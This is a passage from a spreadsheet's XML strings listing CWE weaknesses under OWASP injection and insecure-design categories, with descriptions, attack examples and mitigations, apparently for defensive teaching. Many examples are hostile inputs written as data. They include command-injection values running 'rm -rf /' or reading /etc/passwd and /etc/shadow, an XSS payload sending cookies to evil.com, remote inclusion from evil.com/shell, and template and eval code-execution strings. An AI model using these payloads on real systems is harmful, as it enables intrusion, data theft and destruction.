    <t>The RNG uses a deterministic algorithm that produces predictable output.</t>
  </si>
  <si>
    <t>Linear congruential generator used for session token generation, predictable from observed output.</t>
  </si>
  <si>
    <t>Mersenne Twister (mt_rand) used for security tokens, recoverable after 624 outputs.</t>
  </si>
  <si>
    <t>Weak hash-based DRBG with poor seeding used for key generation.</t>
  </si>
  <si>
    <t>Use NIST-approved DRBG algorithms (CTR_DRBG, Hash_DRBG); use OS CSPRNGs; audit all RNG usage with static analysis; test entropy quality with NIST SP 800-22 test suite.</t>
  </si>
  <si>
    <t>A05</t>
  </si>
  <si>
    <t>Injection</t>
  </si>
  <si>
    <t>CWE-20</t>
  </si>
  <si>
    <t>Improper Input Validation</t>
  </si>
  <si>
    <t>The product receives input but does not validate or incorrectly validates that the input has the properties required for safe processing.</t>
  </si>
  <si>
    <t>Negative quantity in order form accepted: quantity=-5 results in account credit.</t>
  </si>
  <si>
    <t>File upload accepts .php extension because only size is validated, not file type.</t>
  </si>
  <si>
    <t>Email field accepts &lt;script&gt;alert(1)&lt;/script&gt; because only length is checked.</t>
  </si>
  <si>
    <t>Validate all inputs against allowlists; use type-safe APIs; validate length, format, and range; apply input validation at all trust boundaries; use a centralised validation library.</t>
  </si>
  <si>
    <t>CWE-74</t>
  </si>
  <si>
    <t>Injection (General)</t>
  </si>
  <si>
    <t>Software constructs commands or queries using externally-influenced input without neutralising special elements.</t>
  </si>
  <si>
    <t>User input injected directly into shell command: os.system('ping ' + user_ip).</t>
  </si>
  <si>
    <t>Template rendering: render_template_string(user_input) allows SSTI.</t>
  </si>
  <si>
    <t>LDAP query built with user input: '(cn='+username+')' allows LDAP injection.</t>
  </si>
  <si>
    <t>Use parameterised queries and prepared statements; validate input against allowlists; use output encoding appropriate to context; apply principle of least privilege to all downstream systems.</t>
  </si>
  <si>
    <t>CWE-76</t>
  </si>
  <si>
    <t>Improper Neutralization of Equivalent Special Elements</t>
  </si>
  <si>
    <t>The software neutralises some special elements but misses equivalent alternate forms.</t>
  </si>
  <si>
    <t>SQL injection filter blocks ' but not %27 (URL-encoded apostrophe), bypassed via URL encoding.</t>
  </si>
  <si>
    <t>XSS filter strips &lt;script&gt; but not \u003Cscript\u003E (Unicode escape) used in JSON context.</t>
  </si>
  <si>
    <t>Command injection filter blocks semicolons but not URL-decoded %3B variants.</t>
  </si>
  <si>
    <t>Decode/normalise input before validation; validate after all decoding is done; use proven sanitisation libraries; test with multiple encoding variants.</t>
  </si>
  <si>
    <t>CWE-77</t>
  </si>
  <si>
    <t>Command Injection</t>
  </si>
  <si>
    <t>Software constructs a command using user-supplied input without sanitisation.</t>
  </si>
  <si>
    <t>Python: subprocess.call('convert ' + filename, shell=True) — filename='img.jpg; rm -rf /'.</t>
  </si>
  <si>
    <t>PHP: exec('ping '.$_GET['host']) — host='8.8.8.8; cat /etc/passwd'.</t>
  </si>
  <si>
    <t>Node.js: exec(`ffmpeg -i ${userFile}`) — filename includes $() command substitution.</t>
  </si>
  <si>
    <t>Use execFile() with argument arrays instead of shell=True; never pass user input to shell; use allowlists for acceptable values; run processes with minimal privileges.</t>
  </si>
  <si>
    <t>CWE-78</t>
  </si>
  <si>
    <t>OS Command Injection</t>
  </si>
  <si>
    <t>User-controlled data is incorporated into OS commands without sanitisation.</t>
  </si>
  <si>
    <t>PHP: system('ls '.$_GET['dir']) — dir='.; cat /etc/shadow'.</t>
  </si>
  <si>
    <t>Ruby: `nslookup #{params[:host]}` — host='google.com; id'.</t>
  </si>
  <si>
    <t>Java Runtime.exec() called with string built from user input, shell metacharacters not stripped.</t>
  </si>
  <si>
    <t>Use parameterised APIs (ProcessBuilder with arg array); avoid shell=True; validate input against strict allowlist (alphanumeric only); run with minimal OS privileges; use AppArmor/SELinux profiles.</t>
  </si>
  <si>
    <t>CWE-79</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS)</t>
  </si>
  <si>
    <t>User-controllable input is placed in output as a web page without proper escaping.</t>
  </si>
  <si>
    <t>Reflected XSS: search?q=&lt;script&gt;alert(document.cookie)&lt;/script&gt; returned in page.</t>
  </si>
  <si>
    <t>Stored XSS: comment field stores &lt;img src=x onerror=fetch('//evil.com/'+document.cookie)&gt;.</t>
  </si>
  <si>
    <t>DOM XSS: document.write(location.hash) — attacker sends #&lt;script&gt;... link.</t>
  </si>
  <si>
    <t>Context-aware output encoding (HTML, JS, CSS, URL); use modern frameworks with auto-escaping; implement Content Security Policy; use DOMPurify for HTML sanitisation; set HttpOnly cookies.</t>
  </si>
  <si>
    <t>CWE-80</t>
  </si>
  <si>
    <t>Basic XSS (Script Tags in Web Page)</t>
  </si>
  <si>
    <t>The software accepts input that is placed into HTML output without sanitising basic script tags.</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(1)&lt;/script&gt; in user bio field rendered in profile page.</t>
  </si>
  <si>
    <t>&lt;img src='x' onerror='document.location=//attacker.com/'&gt; in product review.</t>
  </si>
  <si>
    <t>&lt;svg onload=alert(1)&gt; in username field rendered in admin panel.</t>
  </si>
  <si>
    <t>Use HTML entity encoding for all user-supplied output; use template engines with auto-escaping; implement CSP; encode &lt; &gt; &amp; " ' characters in HTML context.</t>
  </si>
  <si>
    <t>CWE-83</t>
  </si>
  <si>
    <t>Script Injection in Attributes</t>
  </si>
  <si>
    <t>The software fails to neutralise scripts within HTML tag attributes.</t>
  </si>
  <si>
    <t>&lt;a href='javascript:alert(1)'&gt; — href attribute used for script execution.</t>
  </si>
  <si>
    <t>&lt;img src='x' onerror='stealCookies()'&gt; — event handler injection in attribute.</t>
  </si>
  <si>
    <t>&lt;input value='" onfocus="alert(1)"'&gt; — attribute breakout via unescaped quotes.</t>
  </si>
  <si>
    <t>Encode attribute values; validate URL schemes (block javascript:); use Content Security Policy; apply allowlists for HTML attributes; use DOM-based sanitisation libraries.</t>
  </si>
  <si>
    <t>CWE-86</t>
  </si>
  <si>
    <t>Improper Neutralization of Invalid Characters in Identifiers</t>
  </si>
  <si>
    <t>Invalid or unexpected characters in identifiers are not neutralised, leading to injection or bypasses.</t>
  </si>
  <si>
    <t>Username with null byte: admin%00.guest treated as 'admin' in some C-based systems.</t>
  </si>
  <si>
    <t>Unicode homograph in identifier bypasses ACL check (admin vs аdmin with Cyrillic а).</t>
  </si>
  <si>
    <t>Invalid UTF-8 sequences in cookie value confuse parser, bypassing filter.</t>
  </si>
  <si>
    <t>Normalise and validate all identifier inputs; reject or sanitise invalid characters; use NFC/NFKC Unicode normalisation; apply identifier allowlists; test with fuzzing tools.</t>
  </si>
  <si>
    <t>CWE-88</t>
  </si>
  <si>
    <t>Argument Injection</t>
  </si>
  <si>
    <t>User input is used in a command but argument delimiters are not neutralised.</t>
  </si>
  <si>
    <t>curl command built with user URL: args split allows injecting --output /var/www/html/shell.php.</t>
  </si>
  <si>
    <t>ImageMagick convert command: user-supplied filename injected with -write argument.</t>
  </si>
  <si>
    <t>git clone with user-controlled repo URL allows --upload-pack=&lt;command&gt; injection.</t>
  </si>
  <si>
    <t>Use argument arrays (never strings) for subprocess calls; whitelist allowed argument values; validate all user-supplied values before inclusion in commands.</t>
  </si>
  <si>
    <t>CWE-89</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>User input is concatenated into SQL queries without parameterisation.</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''+username+'' — ' OR '1'='1 bypasses auth.</t>
  </si>
  <si>
    <t>Blind SQLi: parameter sleep(5) in input causes delayed response, confirming injection.</t>
  </si>
  <si>
    <t>Second-order SQLi: stored username retrieved and used unsafely in later query.</t>
  </si>
  <si>
    <t>Use parameterised queries/prepared statements exclusively; use ORM with safe query methods; apply least-privilege DB accounts; implement WAF; use automated SQLi scanners (sqlmap) in CI.</t>
  </si>
  <si>
    <t>CWE-90</t>
  </si>
  <si>
    <t>LDAP Injection</t>
  </si>
  <si>
    <t>User-controlled data is incorporated into LDAP queries without escaping.</t>
  </si>
  <si>
    <t>(&amp;(uid=admin)(*)(userPassword=*)) — wildcard injection bypasses authentication.</t>
  </si>
  <si>
    <t>LDAP search filter: (cn=+input+) — injecting )(objectClass=* retrieves all entries.</t>
  </si>
  <si>
    <t>Blind LDAP injection: differential response to )(uid=* vs )(uid=x reveals valid usernames.</t>
  </si>
  <si>
    <t>Use LDAP parameterisation or escaping libraries; validate input (alphanumeric only for identifiers); use bind DNs with minimal permissions; log LDAP queries for anomaly detection.</t>
  </si>
  <si>
    <t>CWE-91</t>
  </si>
  <si>
    <t>XML/XPath Injection</t>
  </si>
  <si>
    <t>User input is embedded in XML data or XPath queries without proper escaping.</t>
  </si>
  <si>
    <t>XPath: //user[name=''+input+' and pass='x'] — ' or '1'='1 bypasses authentication.</t>
  </si>
  <si>
    <t>XML injection: &lt;n&gt;test&lt;/n&gt;&lt;admin&gt;true&lt;/admin&gt; injected into user XML document.</t>
  </si>
  <si>
    <t>Blind XPath injection: boolean-based queries extract data character by character.</t>
  </si>
  <si>
    <t>Use parameterised XPath queries (XPath variables); XML-encode user input before insertion; validate input against strict allowlists; use XML schema validation.</t>
  </si>
  <si>
    <t>CWE-93</t>
  </si>
  <si>
    <t>CRLF Injection</t>
  </si>
  <si>
    <t>Unfiltered CRLF sequences (\r\n) in user input are included in HTTP headers.</t>
  </si>
  <si>
    <t>Redirect to user-controlled URL includes \r\nSet-Cookie:session=attacker, injecting cookie.</t>
  </si>
  <si>
    <t>Log injection: username=admin\r\n127.0.0.1 - - GET /fake to forge log entries.</t>
  </si>
  <si>
    <t>HTTP response splitting: \r\n\r\n injects second response body for cache poisoning.</t>
  </si>
  <si>
    <t>Strip or reject \r and \n in all values used in HTTP headers; use URL encoding for redirect values; validate header values with allowlists; use framework-provided redirect functions.</t>
  </si>
  <si>
    <t>CWE-94</t>
  </si>
  <si>
    <t>Code Injection</t>
  </si>
  <si>
    <t>The software constructs code using externally-influenced input and evaluates it.</t>
  </si>
  <si>
    <t>Python eval(user_input) — user submits __import__('os').system('id').</t>
  </si>
  <si>
    <t>PHP eval('$x = '.$_GET['val'].';') — attacker injects system('whoami').</t>
  </si>
  <si>
    <t>Ruby instance_eval with user-supplied string executes attacker code in application context.</t>
  </si>
  <si>
    <t>Never use eval() with user input; use safe alternatives (JSON.parse for data, sandboxed evaluators); use AST-based code analysis to detect eval with tainted input.</t>
  </si>
  <si>
    <t>CWE-95</t>
  </si>
  <si>
    <t>Eval Injection</t>
  </si>
  <si>
    <t>User-supplied input is passed to language interpreters (eval, exec) that execute it as code.</t>
  </si>
  <si>
    <t>JavaScript: eval(req.body.expression) — attacker submits require('child_process').exec('rm -rf /').</t>
  </si>
  <si>
    <t>Python exec(compile(user_code,'&lt;string&gt;','exec')) without sandbox.</t>
  </si>
  <si>
    <t>Perl eval($userInput) executes arbitrary Perl code.</t>
  </si>
  <si>
    <t>Avoid eval/exec with user input; use expression parsers with restricted syntax; sandbox code execution with containers/VMs; whitelist allowed operations.</t>
  </si>
  <si>
    <t>CWE-96</t>
  </si>
  <si>
    <t>Static Code Injection</t>
  </si>
  <si>
    <t>User input is written to a file that is later executed or interpreted as code.</t>
  </si>
  <si>
    <t>User-supplied PHP code written to config.php and later included/executed.</t>
  </si>
  <si>
    <t>Template injection: user controls template file content stored server-side and later rendered.</t>
  </si>
  <si>
    <t>Git webhook writes user-controlled payload to .git/hooks/pre-commit, executed on next commit.</t>
  </si>
  <si>
    <t>Never write user input to executable files; validate file content before storage; use integrity checks on server-side scripts; use read-only filesystems where possible.</t>
  </si>
  <si>
    <t>CWE-97</t>
  </si>
  <si>
    <t>Server-Side Includes (SSI) Injection</t>
  </si>
  <si>
    <t>User-controlled data is placed in a page served by SSI-enabled web server without neutralising SSI directives.</t>
  </si>
  <si>
    <t>&lt;!--#exec cmd='cat /etc/passwd'--&gt; injected in username field rendered by SSI-enabled Apache.</t>
  </si>
  <si>
    <t>&lt;!--#include virtual='/etc/shadow'--&gt; in user-controlled content field.</t>
  </si>
  <si>
    <t>&lt;!--#printenv --&gt; reveals all environment variables including secrets.</t>
  </si>
  <si>
    <t>Disable SSI for directories with user content; encode &lt;!-- as HTML entities; audit all SSI-enabled directories; prefer modern templating over SSI.</t>
  </si>
  <si>
    <t>CWE-98</t>
  </si>
  <si>
    <t>PHP Remote File Inclusion</t>
  </si>
  <si>
    <t>PHP include/require uses a user-controlled filename without validation.</t>
  </si>
  <si>
    <t>include($_GET['page'].'.php') — page=http://evil.com/shell executes remote PHP.</t>
  </si>
  <si>
    <t>require($_POST['module']) — module=../../etc/passwd includes sensitive file.</t>
  </si>
  <si>
    <t>LFI: include('pages/'.$_GET['p']) — p=../../../etc/passwd.</t>
  </si>
  <si>
    <t>Disable allow_url_include; use allowlist of valid page names; never use user input directly in include paths; use realpath() to resolve paths; set open_basedir restriction.</t>
  </si>
  <si>
    <t>CWE-99</t>
  </si>
  <si>
    <t>Resource Injection</t>
  </si>
  <si>
    <t>External input is used to construct resource identifiers (filenames, URLs) without sufficient validation.</t>
  </si>
  <si>
    <t>Database name from user input: conn.select_db(user_input) — accesses arbitrary databases.</t>
  </si>
  <si>
    <t>SMTP injection: user-supplied To: header includes CC:attacker@evil.com.</t>
  </si>
  <si>
    <t>JNDI injection: LDAP resource identifier from user input triggers lookup of remote object.</t>
  </si>
  <si>
    <t>Validate and whitelist all resource identifiers; use indirect reference maps; avoid user-controlled identifiers in resource lookups.</t>
  </si>
  <si>
    <t>CWE-103</t>
  </si>
  <si>
    <t>Struts: Incomplete validate() Method</t>
  </si>
  <si>
    <t>Struts action class has an incomplete or missing validate() method definition.</t>
  </si>
  <si>
    <t>Struts form with validate() returning without checking all fields; invalid data saved to DB.</t>
  </si>
  <si>
    <t>Missing super.validate() call means parent validation rules silently skipped.</t>
  </si>
  <si>
    <t>Partial validate() implementation only checks username, not password format.</t>
  </si>
  <si>
    <t>Implement complete validate() methods in all Struts action classes; call super.validate(); use Struts 2 annotations for validation; conduct code review for all Struts action classes.</t>
  </si>
  <si>
    <t>CWE-104</t>
  </si>
  <si>
    <t>Struts: Form Bean Not Extending Validation</t>
  </si>
  <si>
    <t>Struts form bean does not extend the correct validation class, bypassing input validation.</t>
  </si>
  <si>
    <t>LoginForm extends ActionForm but not ValidatorForm, so validator.xml rules not applied.</t>
  </si>
  <si>
    <t>Custom form bean skips DynaValidatorForm, making declarative validation rules ineffective.</t>
  </si>
  <si>
    <t>ActionForm subclass overrides validate() with empty implementation, suppressing all checks.</t>
  </si>
  <si>
    <t>Ensure all Struts form beans extend ValidatorForm or DynaValidatorForm; review all form bean hierarchies; use Struts 2 bean validation annotations; test form input validation comprehensively.</t>
  </si>
  <si>
    <t>CWE-112</t>
  </si>
  <si>
    <t>Missing XML Validation</t>
  </si>
  <si>
    <t>The software accepts XML from an untrusted source but does not validate it against a schema.</t>
  </si>
  <si>
    <t>SOAP endpoint accepts any XML; attacker sends crafted envelope that bypasses business logic checks.</t>
  </si>
  <si>
    <t>XML-based configuration uploaded by user processed without schema validation; invalid nodes execute code paths.</t>
  </si>
  <si>
    <t>REST API accepting application/xml input processes malformed XML that exploits parser edge cases.</t>
  </si>
  <si>
    <t>Validate all XML input against a strict XSD schema; reject invalid documents before processing; use a security-focused XML parser; apply schema validation in the middleware layer.</t>
  </si>
  <si>
    <t>CWE-113</t>
  </si>
  <si>
    <t>HTTP Response Splitting</t>
  </si>
  <si>
    <t>Unfiltered CRLF sequences in HTTP response headers enable response splitting and cache poisoning.</t>
  </si>
  <si>
    <t>Location: /redirect?url=http://evil.com%0d%0aSet-Cookie:session=hijacked injects cookie.</t>
  </si>
  <si>
    <t>Response header built from user-supplied filename includes \r\n, splitting response.</t>
  </si>
  <si>
    <t>Cache poisoning via response splitting: attacker causes proxy to cache malicious page for other users.</t>
  </si>
  <si>
    <t>Strip \r and \n from all values placed into HTTP response headers; use framework-provided header APIs; validate header values against allowlists.</t>
  </si>
  <si>
    <t>CWE-114</t>
  </si>
  <si>
    <t>Process Control</t>
  </si>
  <si>
    <t>The software loads a dynamic library or runs a program whose location can be influenced by attacker-controlled input.</t>
  </si>
  <si>
    <t>Application loads plugin named by user input: dlopen(user_supplied_lib_name + '.so').</t>
  </si>
  <si>
    <t>Java ClassLoader.loadClass() called with user-controlled class name.</t>
  </si>
  <si>
    <t>Python importlib.import_module(user_input) imports attacker-controlled module from search path.</t>
  </si>
  <si>
    <t>Whitelist allowed module/library names; use absolute paths for dynamic loading; validate all dynamic load targets against an allowlist; use signed libraries.</t>
  </si>
  <si>
    <t>CWE-115</t>
  </si>
  <si>
    <t>Misinterpretation of Output</t>
  </si>
  <si>
    <t>The software uses output from an upstream component in a security decision but doesn't correctly interpret it.</t>
  </si>
  <si>
    <t>HTTP status code 302 interpreted as success, allowing redirect to attacker-controlled page without re-authentication.</t>
  </si>
  <si>
    <t>Grep returning exit code 1 (no match) interpreted as error, causing fail-open access decision.</t>
  </si>
  <si>
    <t>Partial match in a security check incorrectly treated as a full match, granting access.</t>
  </si>
  <si>
    <t>Validate and correctly interpret all return codes and output from security-critical functions; test error and edge-case return values; use typed return values where possible.</t>
  </si>
  <si>
    <t>CWE-116</t>
  </si>
  <si>
    <t>Improper Encoding/Escaping of Output</t>
  </si>
  <si>
    <t>The software prepares output for another component but uses incorrect encoding.</t>
  </si>
  <si>
    <t>HTML-escaped output used in JavaScript context without JS escaping, enabling XSS.</t>
  </si>
  <si>
    <t>URL-encoded values placed in HTML without HTML-encoding, enabling HTML injection.</t>
  </si>
  <si>
    <t>SQL-escaped input placed in shell command without shell-escaping, enabling command injection.</t>
  </si>
  <si>
    <t>Apply context-aware encoding; use specialised encoding libraries per context (HTML, JS, SQL, shell, URL); never mix encoding contexts; use parameterisation over encoding where possible.</t>
  </si>
  <si>
    <t>CWE-129</t>
  </si>
  <si>
    <t>Improper Array Index Validation</t>
  </si>
  <si>
    <t>User-supplied values used as array indices are not validated, leading to out-of-bounds access.</t>
  </si>
  <si>
    <t>GET /item?index=99999 with array of size 10 causes ArrayIndexOutOfBoundsException, leaking internal info.</t>
  </si>
  <si>
    <t>Negative index accepted: items[-1] in Python returns last element unexpectedly.</t>
  </si>
  <si>
    <t>C array access with unchecked user index causes buffer over-read, leaking adjacent memory.</t>
  </si>
  <si>
    <t>Validate all array indices against array bounds before use; use bounds-checked data structures; reject negative indices; use safe language constructs.</t>
  </si>
  <si>
    <t>CWE-159</t>
  </si>
  <si>
    <t>Improper Handling of Invalid Use of Special Elements</t>
  </si>
  <si>
    <t>The software receives input with special elements but does not handle invalid uses of them correctly.</t>
  </si>
  <si>
    <t>Null byte in filename: secret.txt%00.jpg — file saved as secret.txt, bypassing extension check.</t>
  </si>
  <si>
    <t>Unicode control characters in username confuse display, enabling spoofing in audit logs.</t>
  </si>
  <si>
    <t>Mixed-direction Unicode (RTL override) in filename causes displayed name to differ from actual.</t>
  </si>
  <si>
    <t>Normalise all input; strip or reject null bytes and Unicode control characters; validate after normalisation; test with comprehensive special character inputs.</t>
  </si>
  <si>
    <t>CWE-470</t>
  </si>
  <si>
    <t>Unsafe Reflection</t>
  </si>
  <si>
    <t>User input controls which class or method is instantiated/called via reflection APIs.</t>
  </si>
  <si>
    <t>Java: Class.forName(userInput).newInstance() — attacker selects Runtime class.</t>
  </si>
  <si>
    <t>PHP: new $className() where className from GET param — instantiates arbitrary class.</t>
  </si>
  <si>
    <t>Python: getattr(module, user_func)() — calls arbitrary module function.</t>
  </si>
  <si>
    <t>Never use user input directly in reflection APIs; use allowlists of permitted class/method names; validate against a registry of safe classes; prefer factory patterns over dynamic instantiation.</t>
  </si>
  <si>
    <t>CWE-493</t>
  </si>
  <si>
    <t>Critical Public Variable Without Final Modifier</t>
  </si>
  <si>
    <t>A public variable meant to be constant is not declared final, allowing modification by other code.</t>
  </si>
  <si>
    <t>public static String ADMIN_ROLE = 'ADMIN' modifiable at runtime by attacker-controlled code.</t>
  </si>
  <si>
    <t>Shared security constant in public field overwritten by malicious plugin or module.</t>
  </si>
  <si>
    <t>Public static encryption key field mutated by reflection in test code accidentally left in production.</t>
  </si>
  <si>
    <t>Declare all security-relevant constants as final (Java) or const (C#); use immutable types; code review for mutable public fields; run static analysis to detect non-final public constants.</t>
  </si>
  <si>
    <t>CWE-500</t>
  </si>
  <si>
    <t>Public Static Field Not Marked Final</t>
  </si>
  <si>
    <t>A public static field not marked final can be modified, undermining security assumptions.</t>
  </si>
  <si>
    <t>public static boolean DEBUG_MODE = false; modified by attacker-controlled class loader.</t>
  </si>
  <si>
    <t>Public static role map overwritten by malicious deserialized object.</t>
  </si>
  <si>
    <t>Security configuration stored in public static mutable field, modified via reflection exploit.</t>
  </si>
  <si>
    <t>Mark all public static security-relevant fields as final; use encapsulation (private + getter); run static analysis for non-final static fields; review for mutable singletons.</t>
  </si>
  <si>
    <t>CWE-564</t>
  </si>
  <si>
    <t>SQL Injection: Hibernate</t>
  </si>
  <si>
    <t>Hibernate ORM queries built with string concatenation using user input are vulnerable to injection.</t>
  </si>
  <si>
    <t>HQL: session.createQuery('FROM User WHERE name=\'' + input + '\'') — SQL injection via HQL.</t>
  </si>
  <si>
    <t>Criteria API misused: session.createSQLQuery('SELECT * FROM users WHERE id='+id).</t>
  </si>
  <si>
    <t>Named query not used — dynamic HQL built with user input bypasses parameterisation.</t>
  </si>
  <si>
    <t>Use Hibernate parameterised queries (setParameter); use Criteria API correctly; avoid createSQLQuery with user input; use Spring Data JPA query methods; audit all Hibernate queries.</t>
  </si>
  <si>
    <t>CWE-610</t>
  </si>
  <si>
    <t>Externally Controlled Reference to Resource in Another Sphere</t>
  </si>
  <si>
    <t>User-controlled input references a resource outside the application's intended scope.</t>
  </si>
  <si>
    <t>URL redirect to user-supplied domain: redirect(user_url) without domain validation.</t>
  </si>
  <si>
    <t>DNS rebinding: attacker-controlled domain resolves to internal IP after validation.</t>
  </si>
  <si>
    <t>SSRF: server fetches user-supplied URL, reaching internal services.</t>
  </si>
  <si>
    <t>Validate resource references against allowlists; use SSRF-safe HTTP clients; implement DNS rebinding protection; segregate internal networks.</t>
  </si>
  <si>
    <t>CWE-643</t>
  </si>
  <si>
    <t>XPath Injection</t>
  </si>
  <si>
    <t>User-controlled input is used in XPath expressions without proper escaping.</t>
  </si>
  <si>
    <t>//users/user[username/text()='' or '1'='1'] — authentication bypass.</t>
  </si>
  <si>
    <t>count(//user[password/text()='' or substring(password,1,1)='a']) — blind extraction.</t>
  </si>
  <si>
    <t>XPath injection in XML-based config: user selects arbitrary nodes.</t>
  </si>
  <si>
    <t>Use parameterised XPath with variable bindings; escape special XPath characters; use XML schema validation to restrict input; log and monitor XPath query anomalies.</t>
  </si>
  <si>
    <t>CWE-644</t>
  </si>
  <si>
    <t>HTTP Header Scripting Syntax</t>
  </si>
  <si>
    <t>HTTP headers returned to the client contain user-influenced scripting syntax without neutralisation.</t>
  </si>
  <si>
    <t>X-Custom-Header reflects user input containing &lt;script&gt; tags rendered by client.</t>
  </si>
  <si>
    <t>Content-Disposition header includes user filename with XSS payload.</t>
  </si>
  <si>
    <t>Location redirect header injects JavaScript: URL from user input.</t>
  </si>
  <si>
    <t>Validate and encode all user-influenced header values; use Content-Type headers to prevent MIME-sniffing; implement CSP; strip script-related content from all HTTP response headers.</t>
  </si>
  <si>
    <t>CWE-917</t>
  </si>
  <si>
    <t>Expression Language Injection (ELI)</t>
  </si>
  <si>
    <t>User input is interpreted by an Expression Language (EL) engine, enabling code execution or data access.</t>
  </si>
  <si>
    <t>Spring SSTI: ${7*7} in template parameter returns 49, confirming EL injection.</t>
  </si>
  <si>
    <t>Thymeleaf template injection: __${T(java.lang.Runtime).getRuntime().exec('id')}__ in URL.</t>
  </si>
  <si>
    <t>EL injection via error message rendered in JSF page with ${userValue}.</t>
  </si>
  <si>
    <t>Disable EL in user-controlled strings; use safe template rendering APIs; apply input validation; use sandboxed EL evaluators; test all template parameters with EL detection payloads.</t>
  </si>
  <si>
    <t>A06</t>
  </si>
  <si>
    <t>Insecure Design</t>
  </si>
  <si>
    <t>CWE-73</t>
  </si>
  <si>
    <t>External Control of File Name or Path</t>
  </si>
  <si>
    <t>User-controlled input determines which file the software accesses.</t>
  </si>
  <si>
    <t>File download: /download?name=report.pdf — name=../../etc/passwd accesses system file.</t>
  </si>
  <si>
    <t>Template selection: render_template($_GET['page']) allows arbitrary file inclusion.</t>
  </si>
  <si>
    <t>Log file viewer: open('/logs/'+request.filename) — traversal reads sensitive logs.</t>
  </si>
  <si>
    <t>Validate and sanitise all user-supplied path components; use allowlists for filenames; canonicalise paths before use; store files with server-generated names.</t>
  </si>
  <si>
    <t>CWE-183</t>
  </si>
  <si>
    <t>Permissive Allowlist</t>
  </si>
  <si>
    <t>An allowlist is used for input validation, but it is too broad, permitting dangerous inputs.</t>
  </si>
  <si>
    <t>File type check allows '.php.jpg' (double extension) as image upload.</t>
  </si>
  <si>
    <t>IP allowlist includes 0.0.0.0/0 (all IPs), effectively disabling the control.</t>
  </si>
  <si>
    <t>Username validation allows special characters that cause injection in downstream systems.</t>
  </si>
  <si>
    <t>Define precise, restrictive allowlists; test edge cases and alternate representations; use regex with anchors (^...$); apply defence-in-depth with multiple validation layers.</t>
  </si>
  <si>
    <t>CWE-256</t>
  </si>
  <si>
    <t>Plaintext Storage of a Password</t>
  </si>
  <si>
    <t>Passwords are stored in plaintext, making them easily accessible if storage is compromised.</t>
  </si>
  <si>
    <t>User passwords stored as plaintext strings in MySQL database.</t>
  </si>
  <si>
    <t>Admin credentials in plaintext text file on web server: /admin/credentials.txt.</t>
  </si>
  <si>
    <t>OAuth client secrets stored plaintext in application database table.</t>
  </si>
  <si>
    <t>Hash passwords with bcrypt/Argon2; use secrets managers for application credentials; never log credentials; encrypt credential stores.</t>
  </si>
  <si>
    <t>CWE-266</t>
  </si>
  <si>
    <t>Incorrect Privilege Assignment</t>
  </si>
  <si>
    <t>The software assigns incorrect privileges to a user or process, granting more access than intended.</t>
  </si>
  <si>
    <t>New user account created with admin role due to default role misconfiguration.</t>
  </si>
  <si>
    <t>Service account granted sysadmin SQL Server role instead of db_datareader.</t>
  </si>
  <si>
    <t>Docker container runs as root due to missing USER directive in Dockerfile.</t>
  </si>
  <si>
    <t>Apply principle of least privilege; review role assignments during provisioning; use RBAC with explicit role grants; audit privilege assignments regularly.</t>
  </si>
  <si>
    <t>CWE-269</t>
  </si>
  <si>
    <t>Improper Privilege Management</t>
  </si>
  <si>
    <t>The software doesn't properly assign, modify, track, or check privileges.</t>
  </si>
  <si>
    <t>Sudo configuration allows www-data to run all commands as root (NOPASSWD: ALL).</t>
  </si>
  <si>
    <t>Application doesn't drop privileges after performing a privileged operation.</t>
  </si>
  <si>
    <t>SUID binary executable by all users calls system() with user-controlled input.</t>
  </si>
  <si>
    <t>Drop privileges immediately after use; avoid SUID binaries; use capability-based systems (Linux capabilities); implement privilege separation; audit sudoers.</t>
  </si>
  <si>
    <t>CWE-286</t>
  </si>
  <si>
    <t>Incorrect User Management</t>
  </si>
  <si>
    <t>The product does not properly manage user accounts, allowing unauthorized actions.</t>
  </si>
  <si>
    <t>Account deletion endpoint allows any authenticated user to delete any account by ID.</t>
  </si>
  <si>
    <t>User registration allows choosing any role including admin via hidden form field.</t>
  </si>
  <si>
    <t>Account enumeration via timing differences in password reset flow reveals valid usernames.</t>
  </si>
  <si>
    <t>Implement server-side user management controls; use RBAC for all user operations; audit all account management endpoints; use consistent response timing to prevent enumeration.</t>
  </si>
  <si>
    <t>CWE-311</t>
  </si>
  <si>
    <t>Missing Encryption of Sensitive Data</t>
  </si>
  <si>
    <t>The software stores or transmits sensitive data without any encryption.</t>
  </si>
  <si>
    <t>Medical records stored in plaintext SQLite database on mobile device.</t>
  </si>
  <si>
    <t>API transmits credit card numbers over HTTP without TLS.</t>
  </si>
  <si>
    <t>Backup files containing PII stored unencrypted on shared network drive.</t>
  </si>
  <si>
    <t>Encrypt sensitive data at rest with AES-256; enforce TLS for all transmissions; use application-layer encryption for sensitive fields; implement data classification.</t>
  </si>
  <si>
    <t>CWE-312</t>
  </si>
  <si>
    <t>Cleartext Storage of Sensitive Information</t>
  </si>
  <si>
    <t>Sensitive data is stored in plaintext in files or memory.</t>
  </si>
  <si>
    <t>User SSNs stored in plaintext VARCHAR column in database.</t>
  </si>
  <si>
    <t>Private keys stored as plaintext PEM files in web-accessible directory.</t>
  </si>
  <si>
    <t>iOS app stores access tokens in plaintext NSUserDefaults plist.</t>
  </si>
  <si>
    <t>Encrypt sensitive fields at application or DB level; use platform keychain APIs; implement field-level encryption; restrict file system access; conduct regular data inventory.</t>
  </si>
  <si>
    <t>CWE-313</t>
  </si>
  <si>
    <t>Cleartext Storage in File or on Disk</t>
  </si>
  <si>
    <t>Sensitive information written to disk in cleartext is accessible to actors with file system access.</t>
  </si>
  <si>
    <t>Temp file /tmp/processing.txt contains user PII written during export.</t>
  </si>
  <si>
    <t>Application log file contains decrypted payment data for debugging.</t>
  </si>
  <si>
    <t>Session data serialised to /var/sessions/ in plaintext readable by all users.</t>
  </si>
  <si>
    <t>Encrypt files containing sensitive data; use secure temp file APIs; scrub memory and disk after use; restrict file permissions; implement full-disk encryption.</t>
  </si>
  <si>
    <t>CWE-316</t>
  </si>
  <si>
    <t>Cleartext Storage of Sensitive Information in Memory</t>
  </si>
  <si>
    <t>Sensitive data (passwords, keys) kept in memory in plaintext is exposed through memory dumps.</t>
  </si>
  <si>
    <t>JVM heap dump contains plaintext user passwords from authentication flow.</t>
  </si>
  <si>
    <t>Android app keeps decrypted private key in memory as byte array for session lifetime.</t>
  </si>
  <si>
    <t>Core dump on crash writes encryption keys from process memory to disk.</t>
  </si>
  <si>
